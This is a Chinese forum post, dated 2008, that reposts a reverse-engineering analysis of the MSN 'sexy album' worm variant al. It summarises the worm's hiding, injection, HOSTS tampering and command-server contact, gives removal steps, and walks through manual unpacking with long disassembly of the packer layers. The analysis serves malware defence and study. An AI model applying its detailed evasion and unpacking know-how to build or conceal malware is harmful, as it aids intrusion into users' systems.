蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱壳部分) - 《浪子论坛》

论坛帖子内容 Thread Content

蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱...

作者 depressedboy 查看 290 发表时间 2008/6/14 22:08 【论坛浏览】

////////////////////////////////////////////////////////////////////////////////////////////////////mvgtst
文章名称：蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱壳部分)mvgtst
文章类型：病毒反汇编逆向分析mvgtst
编写作者：Coderuimvgtst
编写日期：2008年06月13日mvgtst
作者博客：http://hi.baidu.com/coderuimvgtst
下载地址：http://forum.jiangmin.com/UploadFile/2008-6/2008613213532556.txtmvgtst
////////////////////////////////////////////////////////////////////////////////////////////////////mvgtst
****************************************************************************************************mvgtst
----------------------------------------------------------------------------------------------------mvgtst
病毒功能简述：mvgtst
mvgtst
病毒名称：Worm/MSN.SendPhoto.almvgtst
中文名：“性感相册”变种almvgtst
病毒长度：23040 字节mvgtst
病毒类型：蠕虫mvgtst
危险级别：★★mvgtst
影响平台：Win 9X/ME/NT/2000/XP/2003mvgtst
病毒描述：mvgtst
Worm/MSN.SendPhoto.al“性感相册”变种al是蠕虫家族的最新成员之一，采用高级语言编写，并经过添加多层保护壳处理。“性感相册”变种al运行后，会自我复制到被感染计算机系统的“%SystemRoot%\system32\”目录下，并重新命名为“waccs.exe”（文件属性设置为：系统、隐藏、只读）。“性感相册”变种al会在被感染计算机的后台强行篡改用户系统中的HOSTS文件，利用域名映像劫持技术禁止用户访问与安全相关的网站。“性感相册”变种al在运行时，采用进程隐藏技术使自身的进程运行后不显示，这样可以使用户很难发现该病毒的存在。“性感相册”变种al在运行时，会在被感染计算机的后台将恶意可执行代码注入到系统桌面程序“explorer.exe”进程内存的空间中，并调用执行[其中，所注入的恶意代码的功能是：1、以共享方式打开"%SystemRoot%\system32\waccs.exe"文件，防止用户删除该病毒主程序文件。2、建立互斥量“t3x0”，利用进程守护技术原理，用系统“explorer.exe”进程来保护病毒主程序进程不被关闭(循环监视病毒主程序进程是否被关闭，如果发现被关闭则重新调用运行)。]。“性感相册”变种al会在被感染计算机系统的后台利用“E-MAIL”邮件和“MSN”等聊天工具进行群发恶意广告信息，可能还会利用“E-MAIL”邮件和“MSN”等聊天工具进行自我传播。“性感相册”变种al在运行时，会在被感染计算机系统的后台不段循环与骇客指定远程服务器（其中，通信地址为：“http://www.secure.freebsd.la”）进行秘密数据通信，接收从骇客服务器返回的数据包，根据包中骇客定义好的“指令”执行相应的恶意操作。“性感相册”变种al会通过在注册表启动项中添加新键的方式，来实现开机蠕虫病毒自启动。mvgtst
----------------------------------------------------------------------------------------------------mvgtst
mvgtst

引用:

****************************************************************************************************mvgtst
手动杀毒方法步骤(在系统真实环境下测试有效)：mvgtst
mvgtst
1：终止关闭掉病毒保护进程“explorer.exe”(系统桌面程序)。mvgtst
2：结束掉病毒进程“C:\windows\system32\waccs.exe”。mvgtst
3：删除掉病毒程序文件“C:\windows\system32\waccs.exe”。mvgtst
4：重新启动运行系统桌面程序“C:\windows\explorer.exe”，查杀病毒完毕。mvgtst
****************************************************************************************************mvgtst

mvgtst

mvgtst
mvgtst

mvgtst
一、手动脱壳部分(三层壳：UPX + 未知壳 + 压缩壳.)：mvgtst
mvgtst
第一层：UPXmvgtst
mvgtst
0041D100 > 60 PUSHAD ; 第一层UPX壳入口处.[F8]向下走一步.mvgtst
0041D101 BE 00804100 MOV ESI,misfotos.00418000 ; 根据"ESP守恒定律",利用命令"HR ESP"下硬件断点,[F9]运行.mvgtst
0041D106 8DBE 0090FEFF LEA EDI,DWORD PTR DS:[ESI+FFFE9000]mvgtst
0041D10C 57 PUSH EDImvgtst
0041D10D 83CD FF OR EBP,FFFFFFFFmvgtst
0041D110 EB 10 JMP SHORT misfotos.0041D122mvgtst
.mvgtst
.mvgtst
.mvgtst
0041D24B 8D4424 80 LEA EAX,DWORD PTR SS:[ESP-80] ; 运行后停在这里.利用命令"HD"删除硬件断点.mvgtst
0041D24F 6A 00 PUSH 0mvgtst
0041D251 39C4 CMP ESP,EAXmvgtst
0041D253 ^ 75 FA JNZ SHORT misfotos.0041D24Fmvgtst
0041D255 83EC 80 SUB ESP,-80mvgtst
0041D258 - E9 EB44FEFF JMP misfotos.00401748 ; 这里是关键跳转,[F4]运行到这里,再[F8]一次,就到了下一个壳的OEP入口.mvgtst
----------------------------------------------------------------------------------------------------mvgtst
mvgtst
[ 本帖最后由 depressedboy 于 2008-6-14 22:15 编辑 ]mvgtst
mvgtst
----------------------------------------------------------------------------------------------------mvgtst
第二层：未知壳mvgtst
mvgtst
00401748 68 A0000000 PUSH 0A0 ; 第二层未知壳入口处.[F8]向下一直走.mvgtst
0040174D FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharsetmvgtst
00401753 2315 10FE4000 AND EDX,DWORD PTR DS:[40FE10]mvgtst
00401759 B8 D5D4C5E4 MOV EAX,E4C5D4D5mvgtst
0040175E BA 8AF84694 MOV EDX,9446F88Amvgtst
00401763 68 00000000 PUSH 0mvgtst
00401768 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectTypemvgtst
0040176E 330D F0FF4000 XOR ECX,DWORD PTR DS:[40FFF0]mvgtst
00401774 2915 B0F84000 SUB DWORD PTR DS:[40F8B0],EDXmvgtst
0040177A B9 FE6FDB94 MOV ECX,94DB6FFEmvgtst
0040177F 60 PUSHADmvgtst
00401780 68 78000000 PUSH 78mvgtst
00401785 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharsetmvgtst
0040178B B8 99B0188D MOV EAX,8D18B099mvgtst
00401790 23CA AND ECX,EDXmvgtst
00401792 C1D2 13 RCL EDX,13mvgtst
00401795 68 5A000000 PUSH 5Amvgtst
0040179A FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColormvgtst
004017A0 B8 F52BFF3B MOV EAX,3BFF2BF5mvgtst
004017A5 0BC1 OR EAX,ECXmvgtst
004017A7 E9 0C000000 JMP misfotos.004017B8mvgtst
004017AC 81DA 41B3616E SBB EDX,6E61B341mvgtst
004017B2 81E1 02074014 AND ECX,14400702mvgtst
004017B8 68 F0000000 PUSH 0F0mvgtst
004017BD FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharsetmvgtst
004017C3 C1C2 14 ROL EDX,14mvgtst
004017C6 2BC1 SUB EAX,ECXmvgtst
004017C8 1315 80FC4000 ADC EDX,DWORD PTR DS:[40FC80]mvgtst
004017CE 6A 40 PUSH 40mvgtst
004017D0 68 78000000 PUSH 78mvgtst
004017D5 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObjectmvgtst
004017DB 13C8 ADC ECX,EAXmvgtst
004017DD B8 8EC095D3 MOV EAX,D395C08Emvgtst
004017E2 E9 0A000000 JMP misfotos.004017F1mvgtst
004017E7 2BC1 SUB EAX,ECXmvgtst
004017E9 C1D9 13 RCR ECX,13mvgtst
004017EC BA DA3D088C MOV EDX,8C083DDAmvgtst
004017F1 68 5A000000 PUSH 5Amvgtst
004017F6 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharsetmvgtst
004017FC C1D0 17 RCL EAX,17mvgtst
004017FF 1BD1 SBB EDX,ECXmvgtst
00401801 E9 0B000000 JMP misfotos.00401811mvgtst
00401806 B9 D9B0C767 MOV ECX,67C7B0D9mvgtst
0040180B 0115 D0FF4000 ADD DWORD PTR DS:[40FFD0],EDXmvgtst
00401811 68 00100000 PUSH 1000mvgtst
00401816 68 82000000 PUSH 82mvgtst
0040181B FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectTypemvgtst
00401821 23C1 AND EAX,ECXmvgtst
00401823 81CA 3592BBAE OR EDX,AEBB9235mvgtst
00401829 1905 10F94000 SBB DWORD PTR DS:[40F910],EAXmvgtst
0040182F 68 46000000 PUSH 46mvgtst
00401834 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColormvgtst
0040183A C1F1 1C SAL ECX,1Cmvgtst
0040183D B8 56BE5D76 MOV EAX,765DBE56mvgtst
00401842 E9 0C000000 JMP misfotos.00401853mvgtst
00401847 81D1 C57C94A5 ADC ECX,A5947CC5mvgtst
0040184D 40 INC EAXmvgtst
0040184E BA F96C60E2 MOV EDX,E2606CF9mvgtst
00401853 68 6E000000 PUSH 6Emvgtst
00401858 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObjectmvgtst
0040185E 03C8 ADD ECX,EAXmvgtst
00401860 81C2 41CE4169 ADD EDX,6941CE41mvgtst
00401866 3BC8 CMP ECX,EAXmvgtst
00401868 79 0F JNS SHORT misfotos.00401879mvgtst
0040186A 330D A0FF4000 XOR ECX,DWORD PTR DS:[40FFA0]mvgtst
00401870 C1D8 02 RCR EAX,2mvgtst
00401873 210D B0FA4000 AND DWORD PTR DS:[40FAB0],ECXmvgtst
00401879 C1D8 07 RCR EAX,7mvgtst
0040187C 81CA B22C5ABB OR EDX,BB5A2CB2mvgtst
00401882 1BD1 SBB EDX,ECXmvgtst
00401884 68 14000000 PUSH 14mvgtst
00401889 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColormvgtst
0040188F 310D F0F84000 XOR DWORD PTR DS:[40F8F0],ECXmvgtst
00401895 81C2 610C3949 ADD EDX,49390C61mvgtst
0040189B 1B05 A0FE4000 SBB EAX,DWORD PTR DS:[40FEA0]mvgtst
004018A1 3BC8 CMP ECX,EAXmvgtst
004018A3 76 0C JBE SHORT misfotos.004018B1mvgtst
004018A5 81E1 29B246CB AND ECX,CB46B229mvgtst
004018AB 81DA C19BC3A4 SBB EDX,A4C39BC1mvgtst
004018B1 C1C0 06 ROL EAX,6mvgtst
004018B4 0315 A0F84000 ADD EDX,DWORD PTR DS:[40F8A0]mvgtst
004018BA 2105 50F94000 AND DWORD PTR DS:[40F950],EAXmvgtst
004018C0 68 E8240000 PUSH 24E8mvgtst
004018C5 68 14000000 PUSH 14mvgtst
004018CA FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObjectmvgtst
004018D0 3115 20FD4000 XOR DWORD PTR DS:[40FD20],EDXmvgtst
004018D6 81D1 FE912D27 ADC ECX,272D91FEmvgtst
004018DC 68 78000000 PUSH 78mvgtst
004018E1 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColormvgtst
004018E7 2B05 20F84000 SUB EAX,DWORD PTR DS:[40F820]mvgtst
004018ED 0BC2 OR EAX,EDXmvgtst
004018EF BA E1B9BFBE MOV EDX,BEBFB9E1mvgtst
004018F4 81FA F5118A80 CMP EDX,808A11F5mvgtst
004018FA 75 11 JNZ SHORT misfotos.0040190Dmvgtst
004018FC B8 3EC66BBE MOV EAX,BE6BC63Emvgtst
00401901 81C9 41E9FB10 OR ECX,10FBE941mvgtst
00401907 2905 B0F84000 SUB DWORD PTR DS:[40F8B0],EAXmvgtst
0040190D B9 09053E33 MOV ECX,333E0509mvgtst
00401912 BA A1807B32 MOV EDX,327B80A1mvgtst
00401917 1B05 70FD4000 SBB EAX,DWORD PTR DS:[40FD70]mvgtst
0040191D 68 28000000 PUSH 28mvgtst
00401922 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectTypemvgtst
00401928 C1C9 1E ROR ECX,1Emvgtst
0040192B 0105 D0FA4000 ADD DWORD PTR DS:[40FAD0],EAXmvgtst
00401931 E9 0D000000 JMP misfotos.00401943mvgtst
00401936 B9 B16624FB MOV ECX,FB2466B1mvgtst
0040193B 1915 00FD4000 SBB DWORD PTR DS:[40FD00],EDXmvgtst
00401941 13D1 ADC EDX,ECXmvgtst
00401943 6A 00 PUSH 0mvgtst
00401945 68 F0000000 PUSH 0F0mvgtst
0040194A FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObjectmvgtst
00401950 1105 90FF4000 ADC DWORD PTR DS:[40FF90],EAXmvgtst
00401956 BA FAFEEA35 MOV EDX,35EAFEFAmvgtst
0040195B 3BC1 CMP EAX,ECXmvgtst
0040195D 79 09 JNS SHORT misfotos.00401968mvgtst
0040195F 42 INC EDXmvgtst
00401960 2B05 20FF4000 SUB EAX,DWORD PTR DS:[40FF20]mvgtst
00401966 2BCA SUB ECX,EDXmvgtst
00401968 3305 50FC4000 XOR EAX,DWORD PTR DS:[40FC50]mvgtst
0040196E B9 FEA2EB76 MOV ECX,76EBA2FEmvgtst
00401973 68 64000000 PUSH 64mvgtst
00401978 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectTypemvgtst
0040197E 13C8 ADC ECX,EAXmvgtst
00401980 33CA XOR ECX,EDXmvgtst
00401982 81C1 9D3A4307 ADD ECX,7433A9Dmvgtst
00401988 E9 0C000000 JMP misfotos.00401999mvgtst
0040198D 81C2 EA541683 ADD EDX,831654EAmvgtst
00401993 81D1 72147E2A ADC ECX,2A7E1472mvgtst
00401999 68 3C000000 PUSH 3Cmvgtst
0040199E FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharsetmvgtst
004019A4 3315 E0FA4000 XOR EDX,DWORD PTR DS:[40FAE0]mvgtst
004019AA 81C1 2DF6770C ADD ECX,0C77F62Dmvgtst
004019B0 81E9 A1DB420D SUB ECX,0D42DBA1mvgtst
004019B6 3B05 64FD4000 CMP EAX,DWORD PTR DS:[40FD64]mvgtst
004019BC 7E 04 JLE SHORT misfotos.004019C2mvgtst
004019BE C1F2 09 SAL EDX,9mvgtst
004019C1 41 INC ECXmvgtst
004019C2 1105 C0FD4000 ADC DWORD PTR DS:[40FDC0],EAXmvgtst
004019C8 2315 B0FD4000 AND EDX,DWORD PTR DS:[40FDB0]mvgtst
004019CE FF15 4E924100 CALL DWORD PTR DS:[41924E] ; kernel32.VirtualAllocmvgtst
004019D4 8BF0 MOV ESI,EAXmvgtst
004019D6 68 46000000 PUSH 46mvgtst
004019DB FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObjectmvgtst
004019E1 81D1 E665EAFA ADC ECX,FAEA65E6mvgtst
004019E7 3105 40FA4000 XOR DWORD PTR DS:[40FA40],EAXmvgtst
004019ED 3BCA CMP ECX,EDXmvgtst
004019EF 79 08 JNS SHORT misfotos.004019F9mvgtst
004019F1 0BD1 OR EDX,ECXmvgtst
004019F3 B9 D5A0E402 MOV ECX,2E4A0D5mvgtst
004019F8 40 INC EAXmvgtst
004019F9 0915 F0FE4000 OR DWORD PTR DS:[40FEF0],EDXmvgtst
004019FF 0BD0 OR EDX,EAXmvgtst
00401A01 68 32000000 PUSH 32mvgtst
00401A06 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharsetmvgtst
00401A0C 0BC8 OR ECX,EAXmvgtst
00401A0E 0BC8 OR ECX,EAXmvgtst
00401A10 3B15 40FE4000 CMP EDX,DWORD PTR DS:[40FE40]mvgtst
00401A16 71 0E JNO SHORT misfotos.00401A26mvgtst
00401A18 1905 30F94000 SBB DWORD PTR DS:[40F930],EAXmvgtst
00401A1E BA 9DDD9596 MOV EDX,9695DD9Dmvgtst
00401A23 C1E9 1E SHR ECX,1Emvgtst
00401A26 B8 3EE8BC94 MOV EAX,94BCE83Emvgtst
00401A2B 81C1 861A3829 ADD ECX,29381A86mvgtst
00401A31 81E9 F15DE68A SUB ECX,8AE65DF1mvgtst
00401A37 56 PUSH ESImvgtst
00401A38 68 00000000 PUSH 0mvgtst
00401A3D FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectTypemvgtst
00401A43 0115 90FA4000 ADD DWORD PTR DS:[40FA90],EDXmvgtst
00401A49 81E1 B524DB34 AND ECX,34DB24B5mvgtst
00401A4F BA 2A9C114C MOV EDX,4C119C2Amvgtst
00401A54 3B05 EAFE4000 CMP EAX,DWORD PTR DS:[40FEEA]mvgtst
00401A5A 79 0F JNS SHORT misfotos.00401A6Bmvgtst
00401A5C C1D1 1C RCL ECX,1Cmvgtst
00401A5F 81C9 B1DCFAD0 OR ECX,D0FADCB1mvgtst
00401A65 81D2 D2D09685 ADC EDX,8596D0D2mvgtst
00401A6B C1E8 16 SHR EAX,16mvgtst
00401A6E 1BCA SBB ECX,EDXmvgtst
00401A70 68 00000000 PUSH 0mvgtst
00401A75 68 FA000000 PUSH 0FAmvgtst
00401A7A FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgnmvgtst
00401A80 81CA 16FA2657 OR EDX,5726FA16mvgtst
00401A86 0905 E0FF4000 OR DWORD PTR DS:[40FFE0],EAXmvgtst
00401A8C 3B15 EAFE4000 CMP EDX,DWORD PTR DS:[40FEEA]mvgtst
00401A92 76 0B JBE SHORT misfotos.00401A9Fmvgtst
00401A94 B9 395EFC83 MOV ECX,83FC5E39mvgtst
00401A99 0B15 D0F94000 OR EDX,DWORD PTR DS:[40F9D0]mvgtst
00401A9F 81C1 65825161 ADD ECX,61518265mvgtst
00401AA5 C1E0 07 SHL EAX,7mvgtst
00401AA8 C1EA 0B SHR EDX,0Bmvgtst
00401AAB 68 64000000 PUSH 64mvgtst
00401AB0 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectTypemvgtst
00401AB6 B8 F918B92E MOV EAX,2EB918F9mvgtst
00401ABB 1BC2 SBB EAX,EDXmvgtst
00401ABD E9 0B000000 JMP misfotos.00401ACDmvgtst
00401AC2 B9 869B3EB7 MOV ECX,B73E9B86mvgtst
00401AC7 1B05 F0FE4000 SBB EAX,DWORD PTR DS:[40FEF0]mvgtst
00401ACD BB 60124000 MOV EBX,misfotos.00401260mvgtst
00401AD2 68 96000000 PUSH 96mvgtst
00401AD7 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObjectmvgtst
00401ADD C1EA 05 SHR EDX,5mvgtst
00401AE0 290D C0FD4000 SUB DWORD PTR DS:[40FDC0],ECXmvgtst
00401AE6 3BD1 CMP EDX,ECXmvgtst
00401AE8 7E 08 JLE SHORT misfotos.00401AF2mvgtst
00401AEA BA C66B979C MOV EDX,9C976BC6mvgtst
00401AEF C1C1 11 ROL ECX,11mvgtst
00401AF2 03CA ADD ECX,EDXmvgtst
00401AF4 3315 10FB4000 XOR EDX,DWORD PTR DS:[40FB10]mvgtst
00401AFA 2BD1 SUB EDX,ECXmvgtst
00401AFC 68 6E000000 PUSH 6Emvgtst
00401B01 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectTypemvgtst
00401B07 0305 20FE4000 ADD EAX,DWORD PTR DS:[40FE20]mvgtst
00401B0D B9 A5000ABB MOV ECX,BB0A00A5mvgtst
00401B12 03C2 ADD EAX,EDXmvgtst
00401B14 68 14000000 PUSH 14mvgtst
00401B19 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObjectmvgtst
00401B1F 3315 90FC4000 XOR EDX,DWORD PTR DS:[40FC90]mvgtst
00401B25 23D1 AND EDX,ECXmvgtst
00401B27 68 A0000000 PUSH 0A0mvgtst
00401B2C FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColormvgtst
00401B32 B9 AAD1A3A8 MOV ECX,A8A3D1AAmvgtst
00401B37 40 INC EAXmvgtst
00401B38 81FA 3A9082CD CMP EDX,CD82903Amvgtst
00401B3E 7A 07 JPE SHORT misfotos.00401B47mvgtst
00401B40 0BD1 OR EDX,ECXmvgtst
00401B42 B8 524E36FD MOV EAX,FD364E52mvgtst
00401B47 B9 5A47DD0D MOV ECX,0DDD475Amvgtst
00401B4C C1D2 10 RCL EDX,10mvgtst
00401B4F FF33 PUSH DWORD PTR DS:[EBX]mvgtst
00401B51 68 3C000000 PUSH 3Cmvgtst
00401B56 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectTypemvgtst
00401B5C 2B0D D0FF4000 SUB ECX,DWORD PTR DS:[40FFD0]mvgtst
00401B62 81CA 02BDDE9F OR EDX,9FDEBD02mvgtst
00401B68 81F9 2D7FA92C CMP ECX,2CA97F2Dmvgtst
00401B6E 7D 0A JGE SHORT misfotos.00401B7Amvgtst
00401B70 C1C2 1D ROL EDX,1Dmvgtst
00401B73 23D0 AND EDX,EAXmvgtst
00401B75 B8 B6B34935 MOV EAX,3549B3B6mvgtst
00401B7A 03D1 ADD EDX,ECXmvgtst
00401B7C B9 C66C3771 MOV ECX,71376CC6mvgtst
00401B81 68 B4000000 PUSH 0B4mvgtst
00401B86 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColormvgtst
00401B8C 81C9 4AE9DD0F OR ECX,0FDDE94Amvgtst
00401B92 23C2 AND EAX,EDXmvgtst
00401B94 C1E2 18 SHL EDX,18mvgtst
00401B97 8F06 POP DWORD PTR DS:[ESI]mvgtst
00401B99 68 F0000000 PUSH 0F0mvgtst
00401B9E FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObjectmvgtst
00401BA4 81D2 A513B20F ADC EDX,0FB213A5mvgtst
00401BAA 81EA D9325608 SUB EDX,85632D9mvgtst
00401BB0 3B0D 58FA4000 CMP ECX,DWORD PTR DS:[40FA58]mvgtst
00401BB6 71 0E JNO SHORT misfotos.00401BC6mvgtst
00401BB8 1105 00FC4000 ADC DWORD PTR DS:[40FC00],EAXmvgtst
00401BBE 2B0D E0F84000 SUB ECX,DWORD PTR DS:[40F8E0]mvgtst
00401BC4 13C2 ADC EAX,EDXmvgtst
00401BC6 2B15 C0FE4000 SUB EDX,DWORD PTR DS:[40FEC0]mvgtst
00401BCC B9 46AD58D4 MOV ECX,D458AD46mvgtst
00401BD1 68 3C000000 PUSH 3Cmvgtst
00401BD6 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharsetmvgtst
00401BDC 81D2 560493C0 ADC EDX,C0930456mvgtst
00401BE2 2B05 50FC4000 SUB EAX,DWORD PTR DS:[40FC50]mvgtst
00401BE8 B9 66C9A1A9 MOV ECX,A9A1C966mvgtst
00401BED 8136 838221BB XOR DWORD PTR DS:[ESI],BB218283mvgtst
00401BF3 68 F0000000 PUSH 0F0mvgtst
00401BF8 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectTypemvgtst
00401BFE C1C0 0A ROL EAX,0Amvgtst
00401C01 1915 00FC4000 SBB DWORD PTR DS:[40FC00],EDXmvgtst
00401C07 1BC8 SBB ECX,EAXmvgtst
00401C09 81FA F18ED7B1 CMP EDX,B1D78EF1mvgtst
00401C0F 71 0D JNO SHORT misfotos.00401C1Emvgtst
00401C11 13D0 ADC EDX,EAXmvgtst
00401C13 B8 9AB6D2C1 MOV EAX,C1D2B69Amvgtst
00401C18 81D9 22BB5FB5 SBB ECX,B55FBB22mvgtst
00401C1E C1C8 11 ROR EAX,11mvgtst
00401C21 03D1 ADD EDX,ECXmvgtst
00401C23 68 8C000000 PUSH 8Cmvgtst
00401C28 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharsetmvgtst
00401C2E 0B05 00FE4000 OR EAX,DWORD PTR DS:[40FE00]mvgtst
00401C34 81D9 C9CE2159 SBB ECX,5921CEC9mvgtst
00401C3A 68 5A000000 PUSH 5Amvgtst
00401C3F FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectTypemvgtst
00401C45 2BC2 SUB EAX,EDXmvgtst
00401C47 1B0D 60FB4000 SBB ECX,DWORD PTR DS:[40FB60]mvgtst
00401C4D E9 0F000000 JMP misfotos.00401C61mvgtst
00401C52 1B05 30FB4000 SBB EAX,DWORD PTR DS:[40FB30]mvgtst
00401C58 C1C2 04 ROL EDX,4mvgtst
00401C5B 81C1 1206B1A2 ADD ECX,A2B10612mvgtst
00401C61 8106 410E9B09 ADD DWORD PTR DS:[ESI],99B0E41mvgtst
00401C67 68 14000000 PUSH 14mvgtst
00401C6C 68 E6000000 PUSH 0E6mvgtst
00401C71 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgnmvgtst
00401C77 81DA D197286B SBB EDX,6B2897D1mvgtst
00401C7D 81C1 E9767E1F ADD ECX,1F7E76E9mvgtst
00401C83 E9 0B000000 JMP misfotos.00401C93mvgtst
00401C88 B8 3A429A7D MOV EAX,7D9A423Amvgtst
00401C8D 1315 20FD4000 ADC EDX,DWORD PTR DS:[40FD20]mvgtst
00401C93 68 C8000000 PUSH 0C8mvgtst
00401C98 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObjectmvgtst
00401C9E C1D8 05 RCR EAX,5mvgtst
00401CA1 BA 5A7944FA MOV EDX,FA44795Amvgtst
00401CA6 3B0D 26FF4000 CMP ECX,DWORD PTR DS:[40FF26]mvgtst
00401CAC 72 09 JB SHORT misfotos.00401CB7mvgtst
00401CAE C1DA 02 RCR EDX,2mvgtst
00401CB1 210D 70FA4000 AND DWORD PTR DS:[40FA70],ECXmvgtst
00401CB7 1BD0 SBB EDX,EAXmvgtst
00401CB9 B9 5E1AF8E0 MOV ECX,E0F81A5Emvgtst
00401CBE 68 A0000000 PUSH 0A0mvgtst
00401CC3 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColormvgtst
00401CC9 81DA B9742043 SBB EDX,432074B9mvgtst
00401CCF C1E1 06 SHL ECX,6mvgtst
00401CD2 E9 0B000000 JMP misfotos.00401CE2mvgtst
00401CD7 81D1 0122DAA3 ADC ECX,A3DA2201mvgtst
00401CDD BA 8E48FDE4 MOV EDX,E4FD488Emvgtst
00401CE2 81C3 1151EC60 ADD EBX,60EC5111mvgtst
00401CE8 68 D2000000 PUSH 0D2mvgtst
00401CED FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectTypemvgtst
00401CF3 C1E9 13 SHR ECX,13mvgtst
00401CF6 81EA DA05CDAB SUB EDX,ABCD05DAmvgtst
00401CFC E9 0D000000 JMP misfotos.00401D0Emvgtst
00401D01 B9 75BDE543 MOV ECX,43E5BD75mvgtst
00401D06 BA 4D8AE267 MOV EDX,67E28A4Dmvgtst
00401D0B C1C8 03 ROR EAX,3mvgtst
00401D0E 68 FA000000 PUSH 0FAmvgtst
00401D13 68 C8000000 PUSH 0C8mvgtst
00401D18 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgnmvgtst
mvgtst
00401D1E BA 167E846E MOV EDX,6E847E16mvgtst
00401D23 C1C8 03 ROR EAX,3mvgtst
00401D26 3B15 74FC4000 CMP EDX,DWORD PTR DS:[40FC74]mvgtst
00401D2C 76 0C JBE SHORT misfotos.00401D3Amvgtst
00401D2E 1905 C0FE4000 SBB DWORD PTR DS:[40FEC0],EAXmvgtst
00401D34 1B15 E0F84000 SBB EDX,DWORD PTR DS:[40F8E0]mvgtst
00401D3A B8 E9C146FE MOV EAX,FE46C1E9mvgtst
00401D3F 1B15 B0F84000 SBB EDX,DWORD PTR DS:[40F8B0]mvgtst
00401D45 1B05 50FB4000 SBB EAX,DWORD PTR DS:[40FB50]mvgtst
00401D4B 81C3 F3AE139F ADD EBX,9F13AEF3mvgtst
00401D51 68 28000000 PUSH 28mvgtst
00401D56 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharsetmvgtst
00401D5C C1D9 0B RCR ECX,0Bmvgtst
00401D5F 81C1 F9C4B1D6 ADD ECX,D6B1C4F9mvgtst
00401D65 1915 80FD4000 SBB DWORD PTR DS:[40FD80],EDXmvgtst
00401D6B 68 A0000000 PUSH 0A0mvgtst
00401D70 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectTypemvgtst
00401D76 23D1 AND EDX,ECXmvgtst
00401D78 0305 20FC4000 ADD EAX,DWORD PTR DS:[40FC20]mvgtst
00401D7E C1DA 13 RCR EDX,13mvgtst
00401D81 3B0D 6CFF4000 CMP ECX,DWORD PTR DS:[40FF6C]mvgtst
00401D87 71 0E JNO SHORT misfotos.00401D97mvgtst
00401D89 C1D2 1A RCL EDX,1Amvgtst
00401D8C 81E2 8DCC5475 AND EDX,7554CC8Dmvgtst
00401D92 B8 BAC7C622 MOV EAX,22C6C7BAmvgtst
00401D97 C1FA 12 SAR EDX,12mvgtst
00401D9A C1C1 08 ROL ECX,8mvgtst
00401D9D 81C6 6AED2E2F ADD ESI,2F2EED6Amvgtst
00401DA3 68 E6000000 PUSH 0E6mvgtst
00401DA8 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObjectmvgtst
00401DAE 1B05 50F94000 SBB EAX,DWORD PTR DS:[40F950]mvgtst
00401DB4 B9 6AA78799 MOV ECX,9987A76Amvgtst
00401DB9 81FA F23E3F93 CMP EDX,933F3EF2mvgtst
00401DBF 72 07 JB SHORT misfotos.00401DC8mvgtst
00401DC1 23D0 AND EDX,EAXmvgtst
00401DC3 B9 16DFEE35 MOV ECX,35EEDF16mvgtst
00401DC8 81C1 12580249 ADD ECX,49025812mvgtst
00401DCE 13C2 ADC EAX,EDXmvgtst
00401DD0 68 C8000000 PUSH 0C8mvgtst
00401DD5 68 0A000000 PUSH 0Amvgtst
00401DDA FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgnmvgtst
00401DE0 81D2 46B0111A ADC EDX,1A11B046mvgtst
00401DE6 B9 3DCFF281 MOV ECX,81F2CF3Dmvgtst
00401DEB B8 950F5EFE MOV EAX,FE5E0F95mvgtst
